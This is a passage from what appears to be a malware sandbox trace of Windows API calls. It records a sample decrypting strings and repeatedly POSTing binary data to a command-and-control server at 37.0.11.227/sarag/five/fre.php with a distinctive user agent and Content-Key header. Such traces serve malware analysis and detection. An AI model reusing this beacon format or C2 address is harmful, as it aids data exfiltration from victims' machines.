dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0341.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.947] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0341.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.948] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0341.948] GetProcessHeap () returned 0x690000 [0341.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0341.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.949] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0341.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.950] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0341.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.951] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0341.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.955] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0341.955] GetProcessHeap () returned 0x690000 [0341.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0341.955] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0341.955] GetProcessHeap () returned 0x690000 [0341.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0341.956] GetProcessHeap () returned 0x690000 [0341.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0341.956] GetProcessHeap () returned 0x690000 [0341.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0341.957] GetProcessHeap () returned 0x690000 [0341.957] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0341.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0341.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.969] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0342.061] GetProcessHeap () returned 0x690000 [0342.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0342.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.092] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0342.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.094] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0342.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.113] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0342.113] GetProcessHeap () returned 0x690000 [0342.114] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0342.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.115] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0342.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.116] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0342.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.119] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0342.119] GetProcessHeap () returned 0x690000 [0342.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0342.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.120] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0342.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.121] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0342.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.123] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0342.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.124] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0342.124] GetProcessHeap () returned 0x690000 [0342.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0342.124] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0342.124] GetProcessHeap () returned 0x690000 [0342.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0342.124] socket (af=2, type=1, protocol=6) returned 0xc58 [0342.124] connect (s=0xc58, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0342.174] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0342.174] GetProcessHeap () returned 0x690000 [0342.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0342.174] GetProcessHeap () returned 0x690000 [0342.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0342.175] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0342.175] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0342.175] GetProcessHeap () returned 0x690000 [0342.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0342.176] GetProcessHeap () returned 0x690000 [0342.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0342.176] GetProcessHeap () returned 0x690000 [0342.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0342.176] GetProcessHeap () returned 0x690000 [0342.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0342.177] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0342.177] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0342.178] GetProcessHeap () returned 0x690000 [0342.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0342.178] GetProcessHeap () returned 0x690000 [0342.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0342.178] send (s=0xc58, buf=0x6ad508*, len=242, flags=0) returned 242 [0342.178] send (s=0xc58, buf=0x6aba40*, len=159, flags=0) returned 159 [0342.178] GetProcessHeap () returned 0x690000 [0342.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0342.179] recv (in: s=0xc58, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0342.272] GetProcessHeap () returned 0x690000 [0342.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0342.272] GetProcessHeap () returned 0x690000 [0342.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0342.273] GetProcessHeap () returned 0x690000 [0342.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0342.273] GetProcessHeap () returned 0x690000 [0342.276] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0342.276] closesocket (s=0xc58) returned 0 [0342.276] GetProcessHeap () returned 0x690000 [0342.276] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0342.277] GetProcessHeap () returned 0x690000 [0342.277] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0342.277] GetProcessHeap () returned 0x690000 [0342.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0342.278] GetProcessHeap () returned 0x690000 [0342.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0342.278] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19a8) returned 0xc58 [0342.293] Sleep (dwMilliseconds=0xea60) [0342.295] GetProcessHeap () returned 0x690000 [0342.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0342.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.297] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0342.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0342.428] GetProcessHeap () returned 0x690000 [0342.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0342.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.429] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0342.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.430] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0342.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.431] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0342.431] GetProcessHeap () returned 0x690000 [0342.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0342.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.433] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0342.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.434] CryptDestroyKey (hKey=0x69d628) returned 1 [0342.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.434] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0342.434] GetProcessHeap () returned 0x690000 [0342.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0342.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.435] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0342.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.437] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0342.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.438] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0342.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.439] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0342.439] GetProcessHeap () returned 0x690000 [0342.439] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0342.439] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0342.439] GetProcessHeap () returned 0x690000 [0342.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0342.440] GetProcessHeap () returned 0x690000 [0342.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0342.440] GetProcessHeap () returned 0x690000 [0342.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0342.440] GetProcessHeap () returned 0x690000 [0342.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0342.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.442] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0342.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.447] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0342.662] GetProcessHeap () returned 0x690000 [0342.662] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0342.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.663] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0342.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.664] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0342.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.665] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0342.665] GetProcessHeap () returned 0x690000 [0342.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0342.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.680] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0342.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.681] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0342.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.682] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0342.682] GetProcessHeap () returned 0x690000 [0342.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0342.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.683] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0342.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.684] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0342.684] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.685] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0342.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.686] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0342.686] GetProcessHeap () returned 0x690000 [0342.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0342.686] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0342.686] GetProcessHeap () returned 0x690000 [0342.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0342.686] socket (af=2, type=1, protocol=6) returned 0xc5c [0342.686] connect (s=0xc5c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0342.720] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0342.721] GetProcessHeap () returned 0x690000 [0342.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0342.721] GetProcessHeap () returned 0x690000 [0342.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0342.722] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0342.723] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0342.723] GetProcessHeap () returned 0x690000 [0342.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0342.723] GetProcessHeap () returned 0x690000 [0342.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0342.724] GetProcessHeap () returned 0x690000 [0342.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0342.724] GetProcessHeap () returned 0x690000 [0342.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0342.725] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0342.726] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0342.726] GetProcessHeap () returned 0x690000 [0342.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0342.726] GetProcessHeap () returned 0x690000 [0342.726] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0342.727] send (s=0xc5c, buf=0x6ad508*, len=242, flags=0) returned 242 [0342.728] send (s=0xc5c, buf=0x6aba40*, len=159, flags=0) returned 159 [0342.728] GetProcessHeap () returned 0x690000 [0342.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0342.728] recv (in: s=0xc5c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0342.818] GetProcessHeap () returned 0x690000 [0342.819] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0342.822] GetProcessHeap () returned 0x690000 [0342.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0342.822] GetProcessHeap () returned 0x690000 [0342.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0342.823] GetProcessHeap () returned 0x690000 [0342.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0342.823] closesocket (s=0xc5c) returned 0 [0342.824] GetProcessHeap () returned 0x690000 [0342.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0342.824] GetProcessHeap () returned 0x690000 [0342.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0342.825] GetProcessHeap () returned 0x690000 [0342.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0342.825] GetProcessHeap () returned 0x690000 [0342.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0342.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19ac) returned 0xc5c [0342.855] Sleep (dwMilliseconds=0xea60) [0342.857] GetProcessHeap () returned 0x690000 [0342.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0342.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0342.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0342.893] GetProcessHeap () returned 0x690000 [0342.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0342.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.894] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0342.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.909] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0342.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.910] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0342.910] GetProcessHeap () returned 0x690000 [0342.911] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0342.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.912] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0342.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.923] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0342.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0342.924] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0342.924] GetProcessHeap () returned 0x690000 [0342.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0342.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.925] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0342.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.927] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0342.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0342.928] StrStrA 